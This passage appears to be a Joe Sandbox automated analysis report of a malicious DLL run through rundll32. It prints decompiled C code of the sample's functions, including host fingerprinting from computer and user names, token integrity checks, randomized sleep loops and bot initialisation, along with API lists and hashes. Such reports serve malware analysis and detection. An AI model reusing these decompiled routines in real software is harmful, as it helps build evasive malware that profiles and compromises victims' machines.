				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x4b3d238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E04B32496(_v8 + _v8, _t63);
						}
						HeapFree( *0x4b3d238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}




















                                                  0x04b3269c
                                                  0x04b326a4
                                                  0x04b326aa
                                                  0x04b326ad
                                                  0x04b326b0
                                                  0x04b326b2
                                                  0x04b326b7
                                                  0x04b326b7
                                                  0x04b326bd
                                                  0x04b326bf
                                                  0x04b326cc
                                                  0x04b3272d
                                                  0x04b326ce
                                                  0x04b326d3
                                                  0x04b326d9
                                                  0x04b326de
                                                  0x04b326ec
                                                  0x04b326f0
                                                  0x04b326ff
                                                  0x04b32706
                                                  0x04b3270d
                                                  0x04b3270d
                                                  0x04b32718
                                                  0x04b32718
                                                  0x04b326f0
                                                  0x04b326de
                                                  0x04b3272f
                                                  0x04b32735
                                                  0x04b3273f
                                                  0x04b32741
                                                  0x04b32746
                                                  0x04b32755
                                                  0x04b32759
                                                  0x04b32764
                                                  0x04b3276b
                                                  0x04b32772
                                                  0x04b32772
                                                  0x04b3277e
                                                  0x04b3277e
                                                  0x04b32759
                                                  0x04b32787
                                                  0x04b32789
                                                  0x04b3278c
                                                  0x04b3278e
                                                  0x04b32791
                                                  0x04b32794
                                                  0x04b3279e
                                                  0x04b327a2
                                                  0x04b327a6

                                                  APIs
                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 04B326D3
                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 04B326EA
                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 04B326F7
                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04B323D9), ref: 04B32718
                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04B3273F
                                                  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04B32753
                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04B32760
                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04B323D9), ref: 04B3277E
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: HeapName$AllocateComputerFreeUser
                                                  • String ID:
                                                  • API String ID: 3239747167-0
                                                  • Opcode ID: 5a0d4005bb3e70ca1ffd35a0e85a7bab5dfa3ef66c73c54326595dd67006dde6
                                                  • Instruction ID: ae474b48408ee61243eaf67d585395966b6bc9084e0bda7a23a94bcfdf01e32e
                                                  • Opcode Fuzzy Hash: 5a0d4005bb3e70ca1ffd35a0e85a7bab5dfa3ef66c73c54326595dd67006dde6
                                                  • Instruction Fuzzy Hash: 8731E976A00205EFEB15DFAADC81A6EF7F9FF48252F1040AAE505D7250EB34ED459B20
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B3924F, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 100%
                                                  			E04B3924F(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x4b3d25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E04B32049(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E04B39039(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                                  0x04b3925c
                                                  0x04b39263
                                                  0x04b3926a
                                                  0x04b3927e
                                                  0x04b39289
                                                  0x04b392a1
                                                  0x04b392ae
                                                  0x04b392b1
                                                  0x04b392b6
                                                  0x04b392c1
                                                  0x04b392c5
                                                  0x04b392d4
                                                  0x04b392d8
                                                  0x04b392f4
                                                  0x04b392f4
                                                  0x04b392f8
                                                  0x04b392f8
                                                  0x04b392fd
                                                  0x04b39301
                                                  0x04b39307
                                                  0x04b39308
                                                  0x04b3930f
                                                  0x04b39315

                                                  APIs
                                                  • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04B39281
                                                  • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04B392A1
                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04B392B1
                                                  • CloseHandle.KERNEL32(00000000), ref: 04B39301
                                                    • Part of subcall function 04B32049: RtlAllocateHeap.NTDLL(00000000,00000000,04B37E50), ref: 04B32055
                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04B392D4
                                                  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04B392DC
                                                  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04B392EC
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                  • String ID:
                                                  • API String ID: 1295030180-0
                                                  • Opcode ID: 8aec6173cf999d9b6789a18a2ec2c78fb7d842f3fea970795029e27c0dc0cc57
                                                  • Instruction ID: a53800d996b3f51f3c90b6776d9962ded4910aa0091fda63bf9411201294cbdc
                                                  • Opcode Fuzzy Hash: 8aec6173cf999d9b6789a18a2ec2c78fb7d842f3fea970795029e27c0dc0cc57
                                                  • Instruction Fuzzy Hash: 8B212CB5900259FFEF019FA6DD84DAEBB79EB44705F0000A6E511A6150C7759E05DB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B36A56, Relevance: 9.1, APIs: 6, Instructions: 60sleepmemorytimeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 74%
                                                  			E04B36A56(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t26;
				signed int _t33;

				_t26 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x4b3d238 = _t10;
				if(_t10 != 0) {
					 *0x4b3d1a8 = GetTickCount();
					_t12 = E04B38F10(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
							_push(0);
							_push(9);
							_push(_t23 >> 7);
							_push(_t16);
							L04B3B226();
							_t33 = _t14 + _t16;
							_t18 = E04B37E03(_a4, _t33);
							_t19 = 2;
							_t25 = _t33;
							Sleep(_t19 << _t33); // executed
						} while (_t18 == 1);
						if(E04B36B96(_t25) != 0) {
							 *0x4b3d260 = 1; // executed
						}
						_t12 = E04B3225B(_t26); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}













                                                  0x04b36a56
                                                  0x04b36a5c
                                                  0x04b36a5d
                                                  0x04b36a69
                                                  0x04b36a71
                                                  0x04b36a76
                                                  0x04b36a86
                                                  0x04b36a8b
                                                  0x04b36a92
                                                  0x04b36a94
                                                  0x04b36a99
                                                  0x04b36a9f
                                                  0x04b36aa5
                                                  0x04b36aaf
                                                  0x04b36ab3
                                                  0x04b36ab5
                                                  0x04b36aba
                                                  0x04b36abb
                                                  0x04b36abc
                                                  0x04b36ac1
                                                  0x04b36ac7
                                                  0x04b36ad0
                                                  0x04b36ad1
                                                  0x04b36ad6
                                                  0x04b36adc
                                                  0x04b36ae8
                                                  0x04b36aea
                                                  0x04b36aea
                                                  0x04b36af4
                                                  0x04b36af4
                                                  0x04b36a78
                                                  0x04b36a7a
                                                  0x04b36a7a
                                                  0x04b36afe

                                                  APIs
                                                  • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04B3807D,?), ref: 04B36A69
                                                  • GetTickCount.KERNEL32 ref: 04B36A7D
                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,04B3807D,?), ref: 04B36A99
                                                  • SwitchToThread.KERNEL32(?,00000001,?,?,?,04B3807D,?), ref: 04B36A9F
                                                  • _aullrem.NTDLL(?,?,00000009,00000000), ref: 04B36ABC
                                                  • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,04B3807D,?), ref: 04B36AD6
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                  • String ID:
                                                  • API String ID: 507476733-0
                                                  • Opcode ID: 706c918936423520f6785625c559f3a1797933a5110a0755d811f4b9737819fb
                                                  • Instruction ID: f69a782cf5501dc5ec741a47c5032e2a70d26f8856e0a629e2e0e772d1ad58de
                                                  • Opcode Fuzzy Hash: 706c918936423520f6785625c559f3a1797933a5110a0755d811f4b9737819fb
                                                  • Instruction Fuzzy Hash: 121182726442007FE724ABB6DC09B5E7BE8EB44752F10456AF905D7180EAB4F8518671
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B3225B, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 243 4b3225b-4b32276 call 4b3550e 246 4b32278-4b32286 243->246 247 4b3228c-4b3229a 243->247 246->247 249 4b322ac-4b322c7 call 4b33d0d 247->249 250 4b3229c-4b3229f 247->250 256 4b322d1 249->256 257 4b322c9-4b322cf 249->257 250->249 251 4b322a1-4b322a6 250->251 251->249 253 4b3242d 251->253 255 4b3242f-4b32435 253->255 258 4b322d7-4b322ec call 4b31bf4 call 4b31b2f 256->258 257->258 263 4b322f7-4b322fc 258->263 264 4b322ee-4b322f1 CloseHandle 258->264 265 4b32322-4b3233a call 4b32049 263->265 266 4b322fe-4b32303 263->266 264->263 275 4b32366-4b32368 265->275 276 4b3233c-4b32364 memset RtlInitializeCriticalSection 265->276 267 4b32419-4b3241d 266->267 268 4b32309 266->268 270 4b32425-4b3242b 267->270 271 4b3241f-4b32423 267->271 272 4b3230c-4b3231b call 4b3a501 268->272 270->255 271->255 271->270 280 4b3231d 272->280 279 4b32369-4b3236d 275->279 276->279 279->267 281 4b32373-4b32389 RtlAllocateHeap 279->281 280->267 282 4b3238b-4b323b7 wsprintfA 281->282 283 4b323b9-4b323bb 281->283 284 4b323bc-4b323c0 282->284 283->284 284->267 285 4b323c2-4b323e2 call 4b3269c call 4b34094 284->285 285->267 290 4b323e4-4b323eb call 4b396a4 285->290 293 4b323f2-4b323f9 290->293 294 4b323ed-4b323f0 290->294 295 4b323fb-4b323fd 293->295 296 4b3240e-4b32412 call 4b36786 293->296 294->267 295->267 297 4b323ff-4b32403 call 4b33dd9 295->297 300 4b32417 296->300 301 4b32408-4b3240c 297->301 300->267 301->267 301->296
                                                  C-Code - Quality: 57%
                                                  			E04B3225B(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t46;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E04B3550E();
				if(_t21 != 0) {
					_t59 =  *0x4b3d25c; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x4b3d25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x4b3d164(0, 2);
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E04B33D0D( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x4b3d27c; // 0x1fba5a8
					if( *0x4b3d25c > 5) {
						_t8 = _t26 + 0x4b3e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x4b3ea15; // 0x44283a44
						_t27 = _t7;
					}
					E04B31BF4(_t27, _t27);
					_t31 = E04B31B2F(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x4b3d270 =  *0x4b3d270 ^ 0x81bbe65d;
						_t32 = E04B32049(0x60);
						__eflags = _t32;
						 *0x4b3d32c = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x4b3d32c; // 0x6af95b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x4b3d32c; // 0x6af95b0
							 *_t51 = 0x4b3e836;
						}
						__eflags = 0;
						_t54 = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x4b3d238, 0, 0x43);
							__eflags = _t36;
							 *0x4b3d2c4 = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x4b3d25c; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x4b3d27c; // 0x1fba5a8
								_t13 = _t58 + 0x4b3e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x4b3c2a7);
							}
							__eflags = 0;
							_t54 = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E04B3269C( ~_v8 &  *0x4b3d270, 0x4b3d00c); // executed
								_t42 = E04B34094(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E04B396A4(_t55); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E04B36786(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t46 = E04B33DD9(__eflags,  &(_t65[4])); // executed
									_t54 = _t46;
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x4b3d160();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E04B3A501(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}
































                                                  0x04b3225b
                                                  0x04b32266
                                                  0x04b32269
                                                  0x04b3226c
                                                  0x04b3226f
                                                  0x04b32276
                                                  0x04b32278
                                                  0x04b32284
                                                  0x04b32286
                                                  0x04b32286
                                                  0x04b3228f
                                                  0x04b32297
                                                  0x04b3229a
                                                  0x04b322b4
                                                  0x04b322c0
                                                  0x04b322c2
                                                  0x04b322c7
                                                  0x04b322d1
                                                  0x04b322d1
                                                  0x04b322c9
                                                  0x04b322c9
                                                  0x04b322c9
                                                  0x04b322c9
                                                  0x04b322d8
                                                  0x04b322e5
                                                  0x04b322ec
                                                  0x04b322f1
                                                  0x04b322f1
                                                  0x04b322f9
                                                  0x04b322fc
                                                  0x04b32322
                                                  0x04b3232e
                                                  0x04b32333
                                                  0x04b32335
                                                  0x04b3233a
                                                  0x04b32366
                                                  0x04b32368
                                                  0x04b3233c
                                                  0x04b32340
                                                  0x04b32345
                                                  0x04b3234a
                                                  0x04b32351
                                                  0x04b32357
                                                  0x04b3235c
                                                  0x04b32362
                                                  0x04b32369
                                                  0x04b3236b
                                                  0x04b3236d
                                                  0x04b3237c
                                                  0x04b32382
                                                  0x04b32384
                                                  0x04b32389
                                                  0x04b323b9
                                                  0x04b323bb
                                                  0x04b3238b
                                                  0x04b3238b
                                                  0x04b32391
                                                  0x04b3239e
                                                  0x04b323a4
                                                  0x04b323a4
                                                  0x04b323ac
                                                  0x04b323b5
                                                  0x04b323bc
                                                  0x04b323be
                                                  0x04b323c0
                                                  0x04b323c7
                                                  0x04b323d4
                                                  0x04b323d9
                                                  0x04b323de
                                                  0x04b323e0
                                                  0x04b323e2
                                                  0x00000000
                                                  0x00000000
                                                  0x04b323e4
                                                  0x04b323e9
                                                  0x04b323eb
                                                  0x04b323f2
                                                  0x04b323f6
                                                  0x04b323f9
                                                  0x04b3240e
                                                  0x04b32412
                                                  0x04b32417
                                                  0x00000000
                                                  0x04b32417
                                                  0x04b323fb
                                                  0x04b323fd
                                                  0x00000000
                                                  0x00000000
                                                  0x04b32403
                                                  0x04b32408
                                                  0x04b3240a
                                                  0x04b3240c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x04b3240c
                                                  0x04b323ef
                                                  0x04b323ef
                                                  0x04b323c0
                                                  0x04b322fe
                                                  0x04b322fe
                                                  0x04b32303
                                                  0x04b32419
                                                  0x04b3241d
                                                  0x04b32425
                                                  0x04b32425
                                                  0x00000000
                                                  0x04b3241d
                                                  0x04b32309
                                                  0x04b3230c
                                                  0x04b32316
                                                  0x04b3231d
                                                  0x00000000
                                                  0x04b3242d
                                                  0x04b3242d
                                                  0x04b32431
                                                  0x04b32435
                                                  0x04b32435

                                                  APIs
                                                    • Part of subcall function 04B3550E: GetModuleHandleA.KERNEL32(4C44544E,00000000,04B32274,00000000,00000000), ref: 04B3551D
                                                  • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04B322F1
                                                    • Part of subcall function 04B32049: RtlAllocateHeap.NTDLL(00000000,00000000,04B37E50), ref: 04B32055
                                                  • memset.NTDLL ref: 04B32340
                                                  • RtlInitializeCriticalSection.NTDLL(06AF9570), ref: 04B32351
                                                    • Part of subcall function 04B33DD9: memset.NTDLL ref: 04B33DEE
                                                    • Part of subcall function 04B33DD9: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04B33E22
                                                    • Part of subcall function 04B33DD9: StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 04B33E2D
                                                  • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04B3237C
                                                  • wsprintfA.USER32 ref: 04B323AC
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                  • String ID:
                                                  • API String ID: 4246211962-0
                                                  • Opcode ID: 469ad721845535c075d52b5f719fd69bfa4675dbc85de8ed157452997a47489e
                                                  • Instruction ID: 3a1e0559464468bd5ae79e986035a79fbc9d2aab2e0caf0e6c9c6de7ee0c5c0e
                                                  • Opcode Fuzzy Hash: 469ad721845535c075d52b5f719fd69bfa4675dbc85de8ed157452997a47489e
                                                  • Instruction Fuzzy Hash: 65519371A00215ABEF29DBBBDC85A6E77ACEB04707F0444E7E602E7140E678FD448B61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B3163F, Relevance: 6.2, APIs: 4, Instructions: 152memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 302 4b3163f-4b3168b SysAllocString 303 4b31691-4b316bd 302->303 304 4b317af-4b317b2 302->304 310 4b316c3-4b316c6 call 4b32436 303->310 311 4b317ac 303->311 305 4b317b4-4b317b7 SafeArrayDestroy 304->305 306 4b317bd-4b317c0 304->306 305->306 307 4b317c2-4b317c5 SysFreeString 306->307 308 4b317cb-4b317d2 306->308 307->308 313 4b316cb-4b316cf 310->313 311->304 313->311 314 4b316d5-4b316e5 313->314 314->311 316 4b316eb-4b31711 314->316 316->311 319 4b31717-4b3172b 316->319 321 4b31769-4b3176c 319->321 322 4b3172d-4b31730 319->322 323 4b317a3-4b317a8 321->323 324 4b3176e-4b31773 321->324 322->321 325 4b31732-4b31749 322->325 323->311 324->323 326 4b31775-4b31789 call 4b31a70 324->326 330 4b31760-4b31763 SysFreeString 325->330 331 4b3174b-4b31754 call 4b352f9 325->331 326->323 333 4b3178b-4b31790 326->333 330->321 331->330 337 4b31756-4b3175e call 4b32436 331->337 335 4b31792-4b3179c 333->335 336 4b3179e 333->336 335->323 336->323 337->330
                                                  APIs
                                                  • SysAllocString.OLEAUT32(?), ref: 04B31680
                                                  • SysFreeString.OLEAUT32(?), ref: 04B31763
                                                    • Part of subcall function 04B352F9: SysAllocString.OLEAUT32(04B3C2B0), ref: 04B35349
                                                  • SafeArrayDestroy.OLEAUT32(?), ref: 04B317B7
                                                  • SysFreeString.OLEAUT32(?), ref: 04B317C5
                                                    • Part of subcall function 04B32436: Sleep.KERNELBASE(000001F4), ref: 04B3247E
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                  • String ID:
                                                  • API String ID: 3193056040-0
                                                  • Opcode ID: 7170ea03b02540327944b7364accc586c52b2df1ba97948e3beee06963feb4fe
                                                  • Instruction ID: 80cdaa8e15b9462830b6a074ac2a17ef71d745bf08a4f65da022f6ea9cacdb2c
                                                  • Opcode Fuzzy Hash: 7170ea03b02540327944b7364accc586c52b2df1ba97948e3beee06963feb4fe
                                                  • Instruction Fuzzy Hash: 2B5141B6900209EFDB10DFEDC8848AEB7BAFF88341B198969E505EB210D775AD45CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B33AEF, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 340 4b33aef-4b33b30 342 4b33b32-4b33b3b 340->342 343 4b33bb1-4b33bb7 340->343 344 4b33b7b-4b33b7e 342->344 345 4b33b3d-4b33b4d SysAllocString 342->345 348 4b33b80-4b33b8f SysAllocString 344->348 349 4b33bdb 344->349 346 4b33b58-4b33b70 345->346 347 4b33b4f-4b33b56 345->347 356 4b33b74-4b33b79 346->356 351 4b33ba3-4b33ba6 347->351 352 4b33b91 348->352 353 4b33bba-4b33bd9 348->353 350 4b33bdd-4b33be0 349->350 354 4b33be2-4b33bef 350->354 355 4b33b98-4b33b9a 350->355 351->343 357 4b33ba8-4b33bab SysFreeString 351->357 352->355 353->350 354->343 355->351 359 4b33b9c-4b33b9d SysFreeString 355->359 356->344 356->351 357->343 359->351
                                                  APIs
                                                  • SysAllocString.OLEAUT32(80000002), ref: 04B33B46
                                                  • SysAllocString.OLEAUT32(04B31885), ref: 04B33B89
                                                  • SysFreeString.OLEAUT32(00000000), ref: 04B33B9D
                                                  • SysFreeString.OLEAUT32(00000000), ref: 04B33BAB
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree
                                                  • String ID:
                                                  • API String ID: 344208780-0
                                                  • Opcode ID: cadc93eae3913b00351055a51c0dfbff282d7db46d6a79dbe2fdef37b97aa3d2
                                                  • Instruction ID: 2fc53d45df7f03e12707e680a061b690c662e2f7efc5c9ca76e82e86c185da3f
                                                  • Opcode Fuzzy Hash: cadc93eae3913b00351055a51c0dfbff282d7db46d6a79dbe2fdef37b97aa3d2
                                                  • Instruction Fuzzy Hash: 5631EF76900109EFCB05DF99D4C48AE7BF5FF48342B1084AEF90AA7210E735A945CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B394A9, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 360 4b394a9-4b394bc 361 4b394c3-4b394c7 StrChrA 360->361 362 4b394c9-4b394da call 4b32049 361->362 363 4b394be-4b394c2 361->363 366 4b3951f 362->366 367 4b394dc-4b394e8 StrTrimA 362->367 363->361 369 4b39521-4b39528 366->369 368 4b394ea-4b394f3 StrChrA 367->368 370 4b39505-4b39511 368->370 371 4b394f5-4b394ff StrTrimA 368->371 370->368 372 4b39513-4b3951d 370->372 371->370 372->369
                                                  C-Code - Quality: 53%
                                                  			E04B394A9(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E04B32049(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x4b3c2a4); // executed
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x4b3c2a4);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
